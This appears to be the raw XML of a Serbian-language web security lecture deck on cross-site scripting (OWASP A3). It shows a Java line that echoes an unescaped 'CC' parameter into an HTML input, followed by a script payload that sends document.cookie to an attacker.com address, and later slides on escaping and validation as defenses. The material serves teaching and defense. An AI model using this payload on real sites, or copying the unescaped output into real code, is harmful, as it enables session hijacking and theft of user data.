              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ID-a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sesije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sr-Latn-RS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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Cross-Site Scripting (XSS)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sr-Latn-RS" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Umetanje </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="4400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coda</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="44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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' type='TEXT' value='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("CC") + "'&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1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fr-FR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= 'http://www.attacker.com/cgi-bin/cookie.cgi ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;'</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="sr-Latn-RS" sz="7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98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779" y="745957"/>
            <a:ext cx="11557764" cy="5534527"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="65000"/>
              <a:lumOff val="35000"/>
              <a:alpha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en-US" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="4400" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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Nesigurne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podatke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držati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podalje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aktivnog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sadržaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> browser-a.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Izbeći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smeštanje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sadržaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kontekst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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en-US" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validacija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sr-Latn-RS" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>na strani servera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nije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sigurna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odbrana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jer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mnoge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aplikacije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moraju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sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="sr-Latn-RS" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prihvatati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specijalne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znake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-RS" sz="4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70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1203</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>126</Paragraphs>
  <Slides>24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Web sigurnost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sigurnost</dc:title>
  <dc:creator>Lazar Krstic</dc:creator>
  <cp:lastModifiedBy>Lazar Krstic</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-12-21T20:34:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-12-23T08:54:06Z</dcterms:modified>
</cp:coreProperties>
</file>